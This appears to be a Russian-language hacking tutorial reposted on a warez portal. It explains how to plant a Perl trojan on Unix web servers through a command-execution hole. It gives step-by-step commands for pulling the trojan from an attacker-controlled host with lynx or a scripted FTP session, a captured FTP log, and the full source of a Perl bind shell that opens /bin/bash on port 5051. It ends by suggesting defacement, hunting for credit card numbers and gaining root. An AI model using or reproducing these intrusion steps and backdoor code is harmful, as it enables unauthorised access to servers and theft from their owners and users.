Трояним линух » Варез портал рунета

В нете я встречал инфу как залить трой на систему под Win ,например

http://magazine1.xakep.ru/xa/028/056/1.asp?flash=0

http://www.xakep.ru/post/12157/default.asp?flash=0

Но под *nix ни разу ... Наверно все думают что если чел юзает *nix - он все знает ;) - скажу сразу - это заблуждение, есть дофига челов,которые только начинают - вроде меня ;) мне из-за отсутствия инфы пришлось самому разбираться - но когда я почти разобрался , дырку из-за моих real-time экспериментов над сервером прикрыли .... :( - пришлось идти на yahoo.com - искать другой сервак с такой же дырой :) Самый простой способ - если есть lynx (а он есть не всегда,а точнее обычно его нет ). проверить можно дав команду : man lynx - если выскочит много-много непонятных слов на английском - все ок :) Переименовываем трой в index.htm и кладем его на свой
сервер:name.of.your.server ;) Выполняем команды:

lynx name.of.your.server > kyky.pl chmod 0755 kyky.pl kyky.pl

для тех кто не понял - kyky.pl - троян :) Если это не проходит - придется юзать ftp (это встречается чаще,можно также попробовать pftp) Обычно достyпа по FTP под анонимусом нет ,но можно заставить сеpвак самого стащить нyжный скрипт с нyжного FTP-сеpвеpа, написав пpостенький скpипт: r.txt - надо просто выполнять команды на серваке ,единственное условие - скрипт должен пропускать символы < и > - CatalogMgr.pl это делает

1.

положить троян(для примера - kyky.pl) на свой хост name.of.your.server(открыт доступ из нета под анонимусом)

дальше выполняем команды на серваке : 2.

echo open my.host.com> r.txt echo user anonymous blabla@microsoft.com>>r.txt echo get kyky.pl >>r.txt echo bye >>r.txt

или:

1.

положить троян на свой хост,можно зарегить на раз на бесплатном хостинге(кроме народа,бума и.т.д - там скачать нельзя ,я пользовался wallst.ru ;)кладем kyky.pl в cgi-bin :)

2.

echo open odnorazovyihost.dtn.ru >r.txt
echo user LOGIN PASS >>r.txt
echo cd public_html >>r.txt
echo cd cgi-bin >>r.txt
echo get kyky.pl >>r.txt
echo site chmod 0755 kyky.pl >>r.txt
echo bye >>r.txt

для тех кто в танке : в 1,2 строчки надо подставить хост,
логин и пасс с твоего хоста вместо :odnorazovyihost.dtn.ru ,LOGIN, PASS

3.

Теперь выполним его командой :

ftp -dnv < r.txt

Загpyзится FTP-клиент, котоpый пpисоединится по ftp к сеpвеpy , и скачает файл kyky.pl в текущий каталог. Оттyда копиpyем его в нyжное место
- если надо.

у меня при этом сервер выдал : Connected to odnorazovyihost.dtn.ru. 220 as2.centre.ru FTP server (Version 6.00LS) ready. --->

SYST 215 UNIX Type: L8 Version: BSD-199506 Remote system type is UNIX. Using binary mode to transfer files. ---> USER u51258 331 Password required for u51258. ---> PASS XXXX 230 User u51258 logged in, access restrictions apply. ---> CWD public_html 250 CWD command successful. ---> CWD cgi-bin 250 CWD command successful. local: cmd.pl remote: cmd.pl ---> TYPE I 200 Type set to I. ---> PORT 216,24,137,2,4,104 200 PORT command successful.

---> RETR cmd.pl 150 Opening BINARY mode data connection for 'cmd.pl' (378 bytes). 226 Transfer complete. 378 bytes received in 0.0489 seconds (7726 bytes/s) local: kyky.pl remote: kyky.pl ---> PORT 216,24,137,2,4,105 200 PORT command successful. ---> RETR kyky.pl 150 Opening BINARY mode data connection for 'kyky.pl' (6335 bytes). 226 Transfer complete. 6335 bytes received in 1.36 seconds (4642 bytes/s) ---> QUIT 221 Goodbye.

но это сильно зависит от того какой конкретно баг ты
юзаешь и от сервера,но если все ок - должен появиться файл kyky.pl

Сделаем его выполняемым:

chmod 0755 kyky.pl

4. Далее вам нужно только запустить троян такой командой:
kyky.pl
или через IE:
http://victum.com/cgi-bin/kyky.pl

5. если chmod не прошла или не верно написал 1 строчку - #!/usr/bin/perl,пишет нет доступа,выполнить скрипт можно:

perl kyky.pl
вместо:
kyky.pl

6. теперь просто телнетимся к порту который открыл
троян - cmd shell получен!
дальше - по твоей фантазии,можешь дефейсить,искать
СС,можешь ломать дальше - получать рута - но это уже отдельная тема .

и еще,для примера kyky.pl - написан криво,но
пашет :)
- писал не я ,
открывает шелл на 5051 порту

#!/usr/bin/perl
$SHELL="/bin/bash -i";
$LISTEN_PORT="5051";
#$PASSWORD="2221";
require 5.002;
use Socket;
$protocol=getprotobyname('tcp');
socket(S,&PF_INET,&SOCK_STREAM,$protocol)||
die "Error Maks ";
setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1); bind (S,sockaddr_in
($LISTEN_PORT,INADDR_ANY)) || die "Error
Maks ";
listen (S,3) || die "ne mogu otkrit port ";
while(1)
{
YOP: accept (T666,S) || goto YOP;
if(! ($pid=fork))
{
goto BYE if (! defined $pid);
open STDIN,"<&T666";
open STDOUT,">&T666";
open STDERR,">&T666";
exec $SHELL || print T666 "ne mogu otkrit $SHELL ";
close T666;
exit 0;
}
else
{
BYE: close T666;
}
}

Filmplus.Ru - Все новые фильмы за 2008г.

//